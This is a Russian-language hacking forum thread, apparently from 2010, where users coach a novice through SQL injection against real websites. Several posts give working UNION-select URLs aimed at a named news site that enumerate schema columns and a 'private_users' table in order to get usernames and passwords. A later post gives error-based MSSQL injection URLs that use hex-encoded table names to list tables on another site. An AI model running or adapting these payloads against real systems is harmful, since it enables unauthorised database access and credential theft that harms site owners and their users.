05.03.2010, 01:02
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
wildshaman, спасбо, теперь я понял, но вот еще один последний вопрос. Когда я даю запрос, которые есть выше, то на экран выводит user_username и user_password. Как дальше из этих колонок вывести их значения (на данный момент пасс и логин)?
|
|
|
05.03.2010, 01:41
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
http://www.sixls.com/news.php?id=-3+union+select+1,count(*),3+from+private_users--+
0
|
|
|
|
05.03.2010, 02:07
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
Jokester, вывело только 0 и больше ничего =(
|
|
|
|
05.03.2010, 02:12
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Sharsky
Jokester, вывело только 0 и больше ничего =(
Серьёзно? Тебе-же давали линк:
https://forum.antichat.ru/thread104591.html
И ты сказал, что прочёл материал.
Я там видимо по японски писал, соре 
|
|
|
|
05.03.2010, 02:28
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
Прочитал пару раз вашу тему и вот что у меня получилось:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+column_name=0x70616765730d0a--
Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет. |
|
|
|
05.03.2010, 02:40
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Sharsky
Прочитал пару раз вашу тему и вот что у меня получилось:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+column_name=0x70616765730d0a--
Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет.
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,2,count(column_name)+from+information_schema.columns+where+table_name=0x70616765730d0a+--+
Нету там колонок, и после where не column_name, а table_name
|
|
|
|
05.03.2010, 12:37
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Sharsky
Прочитал пару раз вашу тему и вот что у меня получилось:
вот вывод из той самой таблицы, что там могло не получаться?
http://www.sixls.com/news.php?id=-3+union+select+1,page_id,3+from+pages--
Сообщение от Strilo4ka
Jokester хочу твой ответ.
Я бы с удовольствием ответил, но боюсь, что то, что ты пишешь понимаешь только ты сам
Ну или я туповат, я честно пытался понять, но безуспешно.
mr.celt
С линком будет проще
|
|
|
|
05.03.2010, 14:22
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от Jokester
С линком будет проще
отправил в личку
|
|
|
|
05.03.2010, 17:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Strilo4ka, не обижайся, но без разделительных знаков понять то, что ты пишешь, трудновато.
Ты не так меня понял. Запрос на сервер можно послать как угодно, другое дело - сделать это через браузер. В браузере через формы с методом POST данные передаются "как есть", тоесть без какого-либо декодирования.
|
|
|
|
05.03.2010, 11:06
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Вот такой вопросик:
попалась стандартная уязвимость на asp:
http://www.site1.com/detail.asp?sid=1485+or+1=@@version--
нормально выводится версия операционки, дальше пытаюсь вытащить названия столбцов из information_schema вот так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables)--
показывает, что есть таблица 'Photos', дальше через not in:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ('Photos'))--
вылетает ошибка " Line 1: Incorrect syntax near 'Photos' "
пробую так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ("Photos"))--
вылетает: " Invalid column name 'Photos'. "
затестил через <>, заменив название таблицы через хекс так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name<>0x50686f746f73)--
сработало, но больше одного названия вытащить не получается.
Вопрос: как можно полистать названия?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
